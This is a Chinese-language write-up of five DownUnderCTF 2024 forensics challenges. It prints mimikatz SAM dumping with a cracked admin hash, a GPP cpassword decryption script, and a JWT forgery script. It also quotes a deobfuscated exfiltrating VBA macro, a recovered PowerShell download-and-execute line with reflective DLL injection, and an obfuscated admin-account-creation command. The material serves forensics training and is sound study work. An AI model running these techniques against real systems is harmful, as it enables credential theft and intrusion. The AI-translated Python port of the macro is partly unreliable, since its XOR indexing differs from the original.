DownUnderCTF 2024 - Forensics
Baby's First Forensics
他們整個上午都在試圖破壞我們的基礎設施!他們正試圖獲得更多關於我們秘密袋鼠的資訊!我們需要您的幫助,我們已經捕獲了一些他們攻擊我們的流量,您能告訴我們他們使用的是什麼工具及其版本嗎?
注意:將您的答案包裝在
DUCTF{}中,例如DUCTF{nmap_7.25}
附件:capture.pcap
Nikto是一個網頁伺服器掃描器
DUCTF{Nikto_2.1.6}
SAM I AM
攻擊者設法在我們的反叛者域控制器上獲得了域管理員!看起來他們設法使用 WMI 使用帳戶登入並轉儲了一些檔案。
您能否重現他們如何使用提供的工件獲得管理員密碼?
將管理員帳戶的密碼放在DUCTF{}中,例如DUCTF{password123!}
附件:samiam.zip
給了SAM和SYSTEM檔案,要求得到管理員密碼,自然可以想到用mimikatz
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141
SAMKey : 848804bda5d876ca7027beeee0efdd7c
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 476b4dddbbffde29e739b618580adb1e
RID : 000001f5 (501)
User : Guest
去cmd5解hash:476b4dddbbffde29e739b618580adb1e,得到!checkerboard1
感覺小老外應該有可以查到的網站不用爆金幣..
DUCTF{!checkerboard1}
Bad Policies
看起來攻擊者設法訪問了反叛分子的域控制器。
你能弄清楚他們是如何從我們的一臺 Outpost 機器中提取這些文物後獲得訪問許可權的嗎?
附件:badpolicies.zip
參考:https://www.cnblogs.com/404p3rs0n/p/15675872.html
還原組策略中儲存的密碼
找到配置檔案Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>
值得注意的是其中的cpassword項,儲存的是加密後的內容:
B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2
加密方式為AES 256,雖然目前AES 256很難被攻破,但是微軟選擇公開了該AES 256加密的私鑰
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
藉助該私鑰,我們就能還原出明文。
還原方式可採用Chris Campbell @obscuresec開源的powershell指令碼Get-GPPPassword.ps1
專案地址:https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration
該指令碼可在域內主機上執行,能夠自動查詢共享資料夾\SYSVOL中的檔案,還原出所有明文密碼
powershell -executionpolicy bypass -file Get-GPPPassword.ps1
這裡只需要得到cpassword的值,可以直接利用如下程式碼進行解密
#!/usr/bin/python2
import sys
from Crypto.Cipher import AES
from base64 import b64decode
if(len(sys.argv) != 2):
print "decrypt.py <cpassword>"
sys.exit(0)
key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
print out[:-ord(out[-1])].decode('utf16')
DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
emuc2
與所有優秀的民族國家一樣,我們有自己的惡意軟體和 C2 用於進攻性操作。但是有人得到了原始碼,並用它來對付我們!這是我們在一臺膝上型電腦上發現的流量捕獲......
附件:sslkeylogfile.txt 、challenge.pcap
根據sslkeylogfile,聯想到TLS
外部應用程式可以透過 Key Log 解密 TLS 連線。Wireshark 1.6.0 及以上版本可以使用該日誌檔案解密資料包。透過 Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file,告訴 Wireshark 去哪裡尋找 Key 檔案。
追蹤TLS,在流34提到了JWT token可能待會用得到
PRI * HTTP/2.0
SM
..............d.....................................`u..h...A.......X..A-...G.lC.K..iy-"e^B.z...f.....S..j....5Ia.".g.M........
u.^E.1..l...).f..F..(7R......K..zJ.B%........*..(.3
....S.*/*..........................@....................................................N.h._..u.b
&=LtA.a..=.J..2.B...P,.m..eLZ7.@...Rd ...Vz.O_.5I-.BV!.=.....v..ru*.@....RKRVO....I.R?......@.......z.c...........O\.58..:......{"error":"Error validating JWT token - No token provided"}
在流23得到大段加密資料,很可疑,追蹤HTTP2 流
顯示了一個 URL 路徑 /api/env ,一會應該也能用到
既然有http2了,都看一下
發現forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login,用流量包內的使用者密碼登入
{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}
提示沒有許可權檢視flag,那麼要麼是找到密碼登入管理員使用者,要麼就是偽造管理員使用者登入,想起最早看到的JWT token,考慮偽造
結合剛才找到的/api/env內的大量資料,隨便訪問一個看看,如
https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgb
那應該暗示其中的某個檔案是有JWT token的,把剛才得到的路徑儲存
["YeIzRgKdWkx6EhyH8FPtQinoUI42yR7B","SENmvOvr1rC4BQQ7ugTi2Mht9UXUFQQH","3b2NQO9CM7ZinEyVNQkwkVx5r684TIwl","AbZ9FbNDzJ5ACbGKJ8ezjdod2Jr4x0iW","eWnjieXEMQ7Bj6tpLluchBBH7sDsCt3M","hLJh9TRNut3rSLWJQ6CsGs3OuNjmfYxb","M5ZU5KLyrjulq7QpLhKiJMwRrAMq3MZq","1awDrBxaMbwAhOcvfyntbliw3qanrSKT","FIJRM8kwWj1ye4JwPHg7IJg7PxJBtoXX","iu19ErtsjrQgTMohSnGJ46iMVai9ONOZ","2ervnWvp24g0pHZ81V3W9j2k0NmrkY1Z","T4yLN35GKLhxTgaykWxdgROCAwIBE3FO","HW8UkDvnQ8HFrTkyLHOIMMwywiTvCwfS","Cc5LKVk8n2N6F5BD9shXDlBX0NYG5RP3","YB64wqRiqblY7Bhk2z03bvwYLF9pk8o8","OxcOm5DyESp49smKwYmb6N9sr2yjZPv3","khmmeFNPFAhizYWKyvYMnLA7GVsJNvDt","Q3aoz6KBVGScMKS1Jfr6ewy9ix8q9elJ","jwbZUL8C5rj7DeuCEKZBGokgEh4ujMk1","LlqhKxf2yh8loi7ydfBBg18QKjDS33H0","kpSKlqhaNIL8g2EgACu3353i1p3Hh2CJ","n9tt6MNRJRoY8SIKqEoZnqxJpZmujQuR","1l4w5VOiIQ4pf7rid49GvvaXkhD5yIcw","ddl17btjos89HSpMlz4w1esNdp1BbPA7","jYyikfLWMl2nwZKLPZOI7yoX6Gsafj6Y","nx65kRioTaH87erafNtKaogarwPZYgn4","CU6ITn3A3r6PI089rdqbldt1MKSBOR8e","AYenVSd8ShOKt7in9tLAUTb1IPRminC4","BWO7KhzutnIAYRNdiUi6s4PMMheBFC4A","HlFqicDoJqA12cmHy8bnZd0GuSSqqL8q","8J71fW0218FzmBkF8ttefJrz7BpVtI8F","9QCWBIwQaNedL5NrTrymVUln0X9zDaPg","WbUwqhFlnuycALJgSSYb0VjeAgNtIhan","4GagZFf0emVWMqVZGuSQ0Wt3oesDqTId","hJgMfU0P4DZoXEQ3jPLmQqYrMcLL6tMq","Ie4Ct3weRbyqVZuU8D5WEJ9WzDaGkUeG","HBQW4v8Jx72LIeSA3gssnxODtUiR12iY","dlPoTSiQQhQW0LArsYjaXOlg5FhCECNX","1cLnEiDa0ZBFZMg0sRnB6uAGssFooEwd","h9ZZhUm8LRlXcTwSyPkhbyeH8WopzgK1","b6dQeUSvK6BaKu6hqGKjac1wljmECerf","vOW0m1zK5Ene3eEFxoYlGBDY6PhMG6Ug","4Hmer55iqHNq4fMbUgLTT96KDsceFHQz","TS9mqDcYUu9DUA1b9QoPqSeLMZFJNCKq","3zzwJVC13tWXVaBSwumerFZX10ZEwSx5","AL7Q1tqteIiAMoDAKLmx3PQ7uCtb1WCy","ggnR5ZzLSVr12T8k7cyRMAdlBuOLOQAr","w9SSZPc1qWUAGWE8pyLeB9XIRO79mzDs","u2YrePZCdoytCV6Eiund5dcubFdq2hPx","JShVnYgvoW5Lim3WL3qlqRMoTBGU4ATF","rnWQN9Hda8uDMoEqSdVGzvEtXuFJRZTT","u6dGg8b4YO8NylRJlTVnURjBxMlRmtVy","sD2esH8RTuqsD23PlfGCE0q5JdjnLb6t","ELfvFcLKnMyCwj7ruRbSkZKghcY4R2k6","xkzsLBLgP6dzDZYeiTzlwFpdsdS53fbg","L3VHzsrMHOPXtxfjsX9IEuMdWXiAN4lA","WGzrln1mR9mAgIYeCkkYZm5RIvdajkAi","9e1Y8jnY3j7Lkf8a03szPcqPqPDSGv6y","yTYSAZPsUbDCZbOg6XYBlFm7q6G4v3aq","rDmj6xnsGnm0MJQHvpuSbSXmkvanFQca","QFNahJX4von8pvpS5cy6bh2tyWGEcJwK","4LulvNMUoxwKcKXZm7DQxGOyZmUDAxn7","OiGiv5uCIyfNlTf0iePAiNe6lX3pVvJ7","nY8G2nYcKhvEJ5s2BD4SHECmTKKn1CSL","1K4qLxDn5gLF6gzcbetXP6HqGpghXmcI","4B4feCWkGFTlsoBI8Nxca380Xyv9sfA6","cDg0B5zh6q632VASxaeXNejqBABNFpWE","jZN0vVGts01Zr0xIJ6o2b6InEolghLr5","D8YzDAIwPFfLxwFcoCZSW02NzAoRM0lo","YCtiLWwcqptffHjTurKWv0zWlm87upmg","iSf2RPy3sdNeP6roA80UkxgqMrkOoXdf","nQD8z2wBoGOyIZ0311jUWAF0YlXsvg41","8ChT1ap67PVswJSBp6l7K8XLB8xlu89t","h83hTYu1lSFrhnMn1YrUxXdhRyy7lITP","oIjgXMJi0VvqTTvEY4G6ys7BjbQD9bpD","sd8CGK9j5eD0G8UUp0UkdgLc7tjxbkom","gSsaLGJVrbCvhXDa2tsgR9tZpzfd7gbS","GMBb01VPPfnMxJJTANYwfYnckBv0tB2w","JcMLJHRDcwmZ7T4OyoKZHg3A952Rbc3L","fLJBKWU3l5o7N1XxxVlG4JwyHCDqhJFY","ABgupVqa3fWHnbF6u4JH2tIzn4nuXf8e","1rJ4C9rcoWaW40fZEGA4vUY11azYLw04","aOLKa8rN9em0kQ0sfLeoRmVXY7L17Il1","6FND9ZASwt4GYHLuoCwFZ6JXYcYHuAh2","PqGpPjPKySbkf9tZkLS2X63xMHCwNUto","JOGVhN50FMGOUVZnkdDnlrO5OxA66hGA","II7JA9CiCbuvUwgxWP4j22iGBHzWg0SB","mQSKE3GIeUfYPgSF9zXKajKRRUCFyXPd"]
整理一下,抓包爆破。
本來以為都是假檔案,報完看長度發現很多都有引數。搜尋關鍵詞JWT直接定位
得到JWT
JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi
生成新的JWT,data來源如下,就是剛才找到登入密碼的流
import time
import jwt
data = {"subject_id": 1, "exp": 1920187883}
JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"
encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)
在網頁替換JWT令牌後
得到flag
DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}
Macro Magic
我們設法從我們的一臺 Outpost 機器中提取了這個 excel 電子表格工件。它在引擎蓋下發生了一些事情。開啟後,我們發現並捕獲了網路上的一些可疑流量。你能找出這個流量是什麼並找到標誌嗎?
注意:您不需要執行或啟用宏,因此請解決。
附件:macromagic.zip
提到了宏,而且提示不需要執行或啟用宏。使用oledump.py分析,它可以不執行宏就能檢視宏程式碼
專案地址:https://github.com/decalage2/oledump-contrib
需要配合 Python 模組OleFileIO_PL
pip install olefile
使用
┌──(root💀kali)-[~/桌面/oledump-contrib]
└─# python2 oledump.py ../Monke.xlsm
A: xl/vbaProject.bin
A1: 515 'PROJECT'
A2: 107 'PROJECTwm'
A3: M 24526 'VBA/Module1'
A4: m 1158 'VBA/Sheet1'
A5: m 985 'VBA/Sheet2'
A6: m 1158 'VBA/ThisWorkbook'
A7: 4438 'VBA/_VBA_PROJECT'
A8: 3276 'VBA/__SRP_0'
A9: 239 'VBA/__SRP_1'
A10: 434 'VBA/__SRP_2'
A11: 3988 'VBA/__SRP_3'
A12: 384 'VBA/__SRP_4'
A13: 66 'VBA/__SRP_5'
A14: 276 'VBA/__SRP_6'
A15: 66 'VBA/__SRP_7'
A16: 602 'VBA/dir'
查詢宏原始碼
python2 oledump.py -s A3 -v ../Monke.xlsm
-s 段號:選擇上分析出的某一段來檢視內容
-v :解壓縮VBA宏
有很多假資料,如
MDAxMTEwMDAgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMTAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTAxMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTEwMDEgMDAxMTAxMTEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDA=
還有一些解完是FAKEFLAG{DUCTF_Fake_Flag}等等,直接刪去
處理完後得到以下程式碼
Attribute VB_Name = "Module1"
Public Function anotherThing(B As String, C As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(B)
A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
Next I
anotherThing = A
End Function
Public Function importantThing()
Dim tempString As String
Dim tempInteger As Integer
Dim I As Integer
Dim J As Integer
For I = 1 To 5
Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
Next I
For I = 1 To 5
For J = I + 1 To 5
If Cells(J, 2).Value < Cells(I, 2).Value Then
tempString = Cells(I, 1).Value
Cells(I, 1).Value = Cells(J, 1).Value
Cells(J, 1).Value = tempString
tempInteger = Cells(I, 2).Value
Cells(I, 2).Value = Cells(J, 2).Value
Cells(J, 2).Value = tempInteger
End If
Next J
Next I
End Function
Public Function totalyFine(A As String) As String
Dim B As String
B = Replace(A, " ", "-")
totalyFine = B
End Function
Sub macro1()
Dim Path As String
Dim wb As Workbook
Dim A As String
Dim B As String
Dim C As String
Dim D As String
Dim E As String
Dim F As String
Dim G As String
Dim H As String
Dim J As String
Dim K As String
Dim L As String
Dim M As String
Dim N As String
Dim O As String
Dim P As String
Dim Q As String
Dim R As String
Dim S As String
Dim T As String
Dim U As String
Dim V As String
Dim W As String
Dim X As String
Dim Y As String
Dim Z As String
Dim I As Long
N = importantThing()
K = "Yes"
S = "Mon"
U = forensics(K)
V = totalyFine(U)
D = "Ma"
J = "https://play.duc.tf/" + V
superThing (J)
J = "http://flag.com/"
superThing (J)
G = "key"
J = "http://play.duc.tf/"
superThing (J)
J = "http://en.wikipedia.org/wiki/Emu_War"
superThing (J)
N = importantThing()
Path = ThisWorkbook.Path & "\flag.xlsx"
Set wb = Workbooks.Open(Path)
Dim valueA1 As Variant
valueA1 = wb.Sheets(1).Range("A1").Value
MsgBox valueA1
wb.Close SaveChanges:=False
F = "gic"
N = importantThing()
Q = "Flag: " & valueA1
H = "Try Harder"
U = forensics(H)
V = totalyFine(U)
J = "http://downunderctf.com/" + V
superThing (J)
W = S + G + D + F
O = doThing(Q, W)
M = anotherThing(O, W)
A = something(O)
Z = forensics(O)
N = importantThing()
P = "Pterodactyl"
U = forensics(P)
V = totalyFine(U)
J = "http://play.duc.tf/" + V
superThing (J)
T = totalyFine(Z)
MsgBox T
J = "http://downunderctf.com/" + T
superThing (J)
N = importantThing()
E = "Forensics"
U = forensics(E)
V = totalyFine(U)
J = "http://play.duc.tf/" + V
superThing (J)
End Sub
Public Function doThing(B As String, C As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(B)
A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
Next I
doThing = A
End Function
Public Function superThing(ByVal A As String) As String
With CreateObject("MSXML2.ServerXMLHTTP.6.0")
.Open "GET", A, False
.Send
superThing = StrConv(.responseBody, vbUnicode)
End With
End Function
Public Function something(B As String) As String
Dim I As Long
Dim A As String
For I = 1 To Len(inputText)
A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
Next I
something = A
End Function
Public Function forensics(B As String) As String
Dim A() As Byte
Dim I As Integer
Dim C As String
A = StrConv(B, vbFromUnicode)
For I = LBound(A) To UBound(A)
C = C & CStr(A(I)) & " "
Next I
C = Trim(C)
forensics = C
End Function
對程式碼主要部分的簡要分析:
- 函式
anotherThing和doThing- 這兩個函式執行相似的操作,即對兩個字串進行XOR操作。它們遍歷第一個字串的每個字元,將其ASCII值與第二個字串中對應位置(迴圈使用第二個字串)的字元的ASCII值進行XOR操作,然後將結果轉換為字元並拼接起來。
- 函式
importantThing- 這個函式生成5個隨機數,並將它們放在Excel工作表的第二列中。然後,它對這些隨機數進行排序,並相應地調整第一列中的值。
- 函式
totalyFine- 這個函式將輸入字串中的所有空格替換為短劃線(-)。
- 函式
superThing- 這個函式使用MSXML2.ServerXMLHTTP.6.0物件傳送GET請求到指定的URL,並返回響應體的內容(轉換為Unicode字串)。
- 函式
something- 這個函式將輸入字串的每個字元的ASCII值轉換為二進位制字串,並將這些二進位制字串拼接起來。
- 函式
forensics- 這個函式將輸入字串轉換為Unicode位元組陣列,然後將每個位元組轉換為字串並拼接起來,每個位元組之間用空格分隔。
- 子程式
macro1- 這個子程式是程式碼的主要入口點。它呼叫上述函式來執行一系列操作,包括生成隨機數、排序、替換字串中的空格、傳送HTTP請求、轉換字串等。它還開啟一個名為“flag.xlsx”的工作簿,讀取A1單元格的值,並顯示一個訊息框。最後,它使用這些值進行更多的字串操作和HTTP請求。
讓AI重構為python(文心一言的效果還挺好的)
import requests
import os
import random
import openpyxl
from openpyxl import Workbook
def another_thing(b, c):
return ''.join(chr(ord(b[i]) ^ ord(c[(i - 1) % len(c)])) for i in range(len(b)))
def important_thing():
wb = openpyxl.Workbook()
ws = wb.active
for i in range(1, 6):
ws[f'B{i}'] = random.randint(0, 1000)
values = [(ws[f'B{i}'].value, f'A{i}') for i in range(1, 6)]
values.sort()
for i, (val, cell) in enumerate(values):
ws[cell] = i + 1
wb.save('temp.xlsx')
return None
def totaly_fine(a):
return a.replace(" ", "-")
def do_thing(b, c):
return ''.join(chr(ord(b[i]) ^ ord(c[(i - 1) % len(c)])) for i in range(len(b)))
def super_thing(a):
response = requests.get(a)
return response.text
def something(b):
return ''.join(format(ord(c), 'b') for c in b)
def forensics(b):
return ' '.join(str(byte) for byte in b.encode())
def macro1():
important_thing()
k = "Yes"
s = "Mon"
u = forensics(k)
v = totaly_fine(u)
d = "Ma"
j = f"https://play.duc.tf/{v}"
super_thing(j)
j = "http://flag.com/"
super_thing(j)
g = "key"
j = "http://play.duc.tf/"
super_thing(j)
j = "http://en.wikipedia.org/wiki/Emu_War"
super_thing(j)
important_thing()
path = os.path.join(os.getcwd(), 'flag.xlsx')
wb = openpyxl.load_workbook(path)
value_a1 = wb.sheets[0]['A1'].value
print(value_a1)
wb.close()
f = "gic"
important_thing()
q = f"Flag: {value_a1}"
h = "Try Harder"
u = forensics(h)
v = totaly_fine(u)
j = f"http://downunderctf.com/{v}"
super_thing(j)
w = s + g + d + f
o = do_thing(q, w)
m = another_thing(o, w)
a = something(o)
z = forensics(o)
important_thing()
p = "Pterodactyl"
u = forensics(p)
v = totaly_fine(u)
j = f"http://play.duc.tf/{v}"
super_thing(j)
t = totaly_fine(z)
print(t)
j = f"http://downunderctf.com/{t}"
super_thing(j)
important_thing()
e = "Forensics"
u = forensics(e)
v = totaly_fine(u)
j = f"http://play.duc.tf/{v}"
super_thing(j)
# Run the macro
macro1()
python的可讀性就更高了
w = s + g + d + f
o = do_thing(q, w)
m = another_thing(o, w)
很明顯這一塊是在做異或,w對應的應該就是xor key,回去找相應的數值
s = "Mon"
g = "key"
d = "Ma"
f = "gic"
得到key:MonkeyMagic,現在就差密文了
結合宏程式碼中的各種拼接URL,流量包就排上了用場
https://downunderctf.com/84-114-121-32-72-97-114-100-101-114
https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108
https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19
https://play.duc.tf/70-111-114-101-110-115-105-99-115
試了一下,除了第三條,10進位制轉字元後分別是Try Harder、Pterodactyl、Forensics
那麼密文應該就是第三條了,長度也比較符合。
編寫解密指令碼
def decode(encoded, key):
return ''.join(chr(encoded[i] ^ ord(key[(i) % len(key)])) for i in range(len(encoded)))
flag = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"
decoded_message = decode(flag, key)
print(decoded_message)
執行得到 Flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}
Lost in Memory
看起來我們的一名鴯鶓士兵在 Outpost 機器上執行了一些東西,現在它正在做奇怪的事情。作為預防措施,我們採取了記憶體轉儲。你能告訴我們發生了什麼嗎?
這個挑戰有四個部分,可以組合成最終的標誌,每個答案_之間。找到所有四個答案並將它們組合成所有小寫字母的標誌,例如DUCTF{answer1_answer2_answer3_answer4}。DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}
- 惡意可執行檔案的名稱是什麼? 例如
malicious.xlsm- 使用的 powershell 模組的名稱是什麼? 例如
invoke-mimikatz- 從惡意可執行檔案執行的兩個檔案的名稱是什麼(按字母順序,中間有 - 和沒有空格)? 例如
malware.exe-malware2.exe- 透過 powershell 建立的新帳戶的密碼是什麼? 例如
strong-password123
附件:EMU-OUTPOST.zip
先查版本
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw imageinfo
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 cmdscan
在命令列看到可以檔名 monkey.doc.ps1,即為第一問的答案
繼續往下翻還有
notepad.exe pid: 3048
Command line : "C:\Windows\System32\notepad.exe" "C:\Users\emu\Downloads\monkey.doc.ps1"
找到對應的程序號
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pstree
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8439a030:notepad.exe 4044 3176 3 78 2024-06-18 10:00:15 UTC+0000
把程序dump下來
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 4044 --dump-dir=/root/桌面
從剛才的命令分析來看monkey.doc.ps1是透過 powershell 執行的,查詢關鍵詞
strings ../../4044.dmp | grep "powershell"
powershell.exe
powershell/
powershell.exe
powershell.exe
powershell.exe
powershell/
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
powershell $PKjAU= ") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."; .( $Env:CoMsPeC[4,24,25]-JOIn'')(-join ( gi vaRiaBlE:pKjAU).valUe[-1 .. - ( ( gi vaRiaBlE:pKjAU).valUe.leNgth) ] )
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
......
這段 PowerShell 指令碼看起來是經過混淆的
問了下文心一言
分析變數賦值:首先,檢視
$PKjAU變數的賦值。注意字串中的拼接模式,比如'dd'+'a/'實際上是'dda/'。解碼字串:使用 PowerShell 來執行字串解碼。由於字串是從後往前拼接的,你可能需要編寫一個 PowerShell 指令碼來逆序解碼這個字串。
得到 5up3r-5ecur3,即為第四問的答案
現在只得到了第一問和第四問的答案
後面才發現,可以使用 vol2 中的控制檯外掛,因為它為每個命令提供了更詳細的檢視。
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 consoles
注意到在powershell有兩個命令,去定位powershell的PID,有好幾個,正確的是1136,如果提取2520的話會少一個dll
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pslist
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ---------
0x8449c528 powershell.exe 1136 3176 17 432 1 0 2024-06-18 10:01:08 UTC+0000
0x8452f600 powershell.exe 2520 1136 11 306 1 0 2024-06-18 10:01:35 UTC+0000
取出powershell的程序
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 2520 --dump-dir=/root/桌面
轉存為文字
strings ../../1136.dmp > ../../1136.txt
定位關鍵詞New-Object
{iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}
提到了Invoke-ReflectivePEInjection這表明整個攻擊場景與反射性 DLL 注入有關
所以第二問答案為 Invoke-ReflectivePEInjection,第三問為emu.dll-kiwi.dll
完整flag:DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}
總結
對我來說題目挺新穎的,趣味性兼併挑戰性
學到了很多工具的使用以及一些細節性的取證分析手法
部分Writeups參考:
https://warlocksmurf.github.io/posts/ductf2024/
https://www.youtube.com/watch?v=86IwT9UDIsk